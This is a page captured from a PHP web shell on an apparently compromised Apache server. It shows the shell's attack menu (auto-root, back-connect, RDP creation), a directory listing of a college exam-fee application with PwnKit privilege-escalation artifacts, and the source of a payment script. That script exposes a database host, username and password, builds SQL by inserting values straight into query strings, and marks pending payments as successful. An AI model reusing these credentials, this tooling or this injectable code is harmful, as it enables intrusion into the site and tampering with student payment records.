Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.118.208.127
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
ssa /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
Excel_Writer
[ DIR ]
drwxrwxrwx
Excel_reader
[ DIR ]
drwxrwxrwx
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
JQGrid3.5
[ DIR ]
drwxrwxrwx
Report_details
[ DIR ]
drwxrwxrwx
Report_details_16042016
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
custom_js
[ DIR ]
drwxrwxrwx
custom_src
[ DIR ]
drwxrwxrwx
grid_display_files
[ DIR ]
drwxrwxrwx
html_modules
[ DIR ]
drwxrwxrwx
html_modules_16042016
[ DIR ]
drwxrwxrwx
images
[ DIR ]
drwxrwxrwx
img
[ DIR ]
drwxrwxrwx
imported_files
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
js_16042016
[ DIR ]
drwxrwxrwx
libs
[ DIR ]
drwxrwxrwx
links
[ DIR ]
drwxrwxrwx
maya-pdf
[ DIR ]
drwxrwxrwx
schema
[ DIR ]
drwxrwxrwx
src
[ DIR ]
drwxrwxrwx
src_16042016
[ DIR ]
drwxrwxrwx
student_photos
[ DIR ]
drwxrwxrwx
tarka_pdf
[ DIR ]
drwxrwxrwx
tarka_pdf_latest
[ DIR ]
drwxrwxrwx
tcpdf
[ DIR ]
drwxrwxrwx
tmpphotos
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
.ssa.php
3.61
KB
-rw-r--r--
MainPage.html
12.3
KB
-rwxrwxrwx
MainPagepopup.html
7.05
KB
-rwxrwxrwx
app.php
416
B
-rwxrwxrwx
cconfig_old.php
1.13
KB
-rwxrwxrwx
collegeInfoPopup.html
3.79
KB
-rwxrwxrwx
homepage.html
3.35
KB
-rwxrwxrwx
index.php
80
B
-rwxrwxrwx
index_stop.html
5.83
KB
-rwxrwxrwx
indexlogin.html
5.81
KB
-rwxrwxrwx
paytm_res.php
4.17
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
resetPasswordOTP.html
2.03
KB
-rwxrwxrwx
resetPasswordPopup.html
1.79
KB
-rwxrwxrwx
spinner_bar.gif
1.81
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : paytm_res.php
<?php ini_set('max_execution_time', 600); $servername = "97.74.228.93"; $username = "logisys3_logu"; $password = "Logisys@2106"; $dbname = "logisys3_ssa"; /*$servername = "localhost"; $username = "root"; $password = ""; $dbname = "resultsg_kus";*/ $conn = new mysqli($servername, $username, $password, $dbname); $query = "select ac.appno, ac.fregno, ac.FPAYMENTSTATUS, ac.FPAYGATEWAY,kp.fname as fname, ac.FDATE, ac.fcollcode, ac.fdegree, kp.ftranid from appcandsum ac inner join pg_txn kp on ac.appno = kp.fappno and ac.fregno = kp.fregno where ifnull(ac.FPAYMENTSTATUS,'') <> 'success'"; $resultm = $conn->query($query); if (mysqli_num_rows($resultm) > 0) { while($row = mysqli_fetch_assoc($resultm)) { $productinfo = $row['appno']; $regno = $row['fregno']; $paytm = $row['FPAYGATEWAY']; $degree = $row['fdegree']; $collcode = $row['fcollcode']; $fname = $row['fname']; $ftranid = $row['ftranid']; //$firstname = "paytm"; $update="update appcandsum set FPAYMENTREMARKS='{$ftranid}',FPAYMENTSTATUS='success', FPAYMENTCONFIRM='success',FACKDATE=now(),FACKUSER='{$fname}',FPAYGATEWAY = '{$fname}' where APPNO='{$productinfo}'"; $result = $conn->query($update); $update_cand_sum = "UPDATE appcandsum a,candsum c SET c.FEXAMFEEA=if(ifnull(c.FEXAMFEEA,0) <=0,ifnull(a.FEXAMFEEA,0),ifnull(c.FEXAMFEEA,0)), c.FEXAMFEEB=if(ifnull(c.FEXAMFEEB,0) <=0,ifnull(a.FEXAMFEEB,0),ifnull(c.FEXAMFEEB,0)), c.FEXAMFEEC=if(ifnull(c.FEXAMFEEC,0) <=0,ifnull(a.FEXAMFEEC,0),ifnull(c.FEXAMFEEC,0)), c.FEXAMFEED=if(ifnull(c.FEXAMFEED,0) <=0,ifnull(a.FEXAMFEED,0),ifnull(c.FEXAMFEED,0)), c.FEXAMFEEE=if(ifnull(c.FEXAMFEEE,0) <=0,ifnull(a.FEXAMFEEE,0),ifnull(c.FEXAMFEEE,0)), c.FEXAMFEEF=if(ifnull(c.FEXAMFEEF,0) <=0,ifnull(a.FEXAMFEEF,0),ifnull(c.FEXAMFEEF,0)), c.FEXAMFEEG=if(ifnull(c.FEXAMFEEG,0) <=0,ifnull(a.FEXAMFEEG,0),ifnull(c.FEXAMFEEG,0)), c.FEXAMFEEH=if(ifnull(c.FEXAMFEEH,0) <=0,ifnull(a.FEXAMFEEH,0),ifnull(c.FEXAMFEEH,0)), c.FEXAMFEEI=if(ifnull(c.FEXAMFEEI,0) <=0,ifnull(a.FEXAMFEEI,0),ifnull(c.FEXAMFEEI,0)), c.FEXAMFEEJ=if(ifnull(c.FEXAMFEEJ,0) <=0,ifnull(a.FEXAMFEEJ,0),ifnull(c.FEXAMFEEJ,0)), c.FTOTALFEE=a.FTOTALFEE, c.frecptdate = date(now()) WHERE a.fregno=c.FREGNO AND a.APPNO='{$productinfo}' and a.FCOLLCODE='{$collcode}'"; $result = $conn->query($update_cand_sum); $update_cand_appCand = "update canddet c, appcanddet t set c.finserted = t.finserted, c.fpresent = t.fpresent where c.fdegree = t.fdegree and c.fexamno = t.fexamno and c.fregno = t.fregno and c.fsubcode = t.fsubcode and c.fdegree = '{$degree}' and c.fregno = '{$regno}' and t.APPNO='{$productinfo}' and ifnull(c.fpresent,'') <> 'P'"; $result = $conn->query($update_cand_appCand); $insert_canddet ="insert into canddet(fdegree,FEXAMNO, FCOLLCODE, FREGNO, FSUBCODE, FINSERTED, FPRESENT, FYEAR, FEXAMTYPE) select fdegree, FEXAMNO, FCOLLCODE,FREGNO, FSUBCODE,FINSERTED, FPRESENT, FYEAR,FEXAMTYPE from appcanddet where fregno = '{$regno}' and appno ='{$productinfo}' and CONCAT(fdegree,fexamno,fregno,fsubcode) not in(select CONCAT(fdegree,fexamno,fregno,fsubcode) from canddet where fregno = '{$regno}') "; //$lobj_insert_canddet = $aobj_context->mobj_db->Execute($insert_canddet); $result = $conn->query($insert_canddet); $update_studfee = "update studfee s, appstudfee a set s.famount = a.famount, s.flogdate = a.flogdate where s.fdegree = a.fdegree and s.fexamno = a.fexamno and s.fregno = a.fregno and s.ffeecode = a.ffeecode and s.fregno = '{$regno}' and a.appno ='{$productinfo}'"; $result = $conn->query($update_studfee); $insert_studfee = "insert into studfee(fdegree,fexamno,fcollcode,fregno,ffeecode,famount,flogdate) select fdegree,fexamno,fcollcode,fregno,ffeecode,famount,flogdate from appstudfee where fregno = '{$regno}' and appno ='{$productinfo}' and CONCAT(fdegree,fexamno,fregno,ffeecode) not in(select CONCAT(fdegree,fexamno,fregno,ffeecode) from studfee where fdegree = '{$degree}' and fregno = '{$regno}')"; //var_dump($insert_studfee); echo $regno; echo "<br/>"; $result = $conn->query($insert_studfee); } } ?>
Close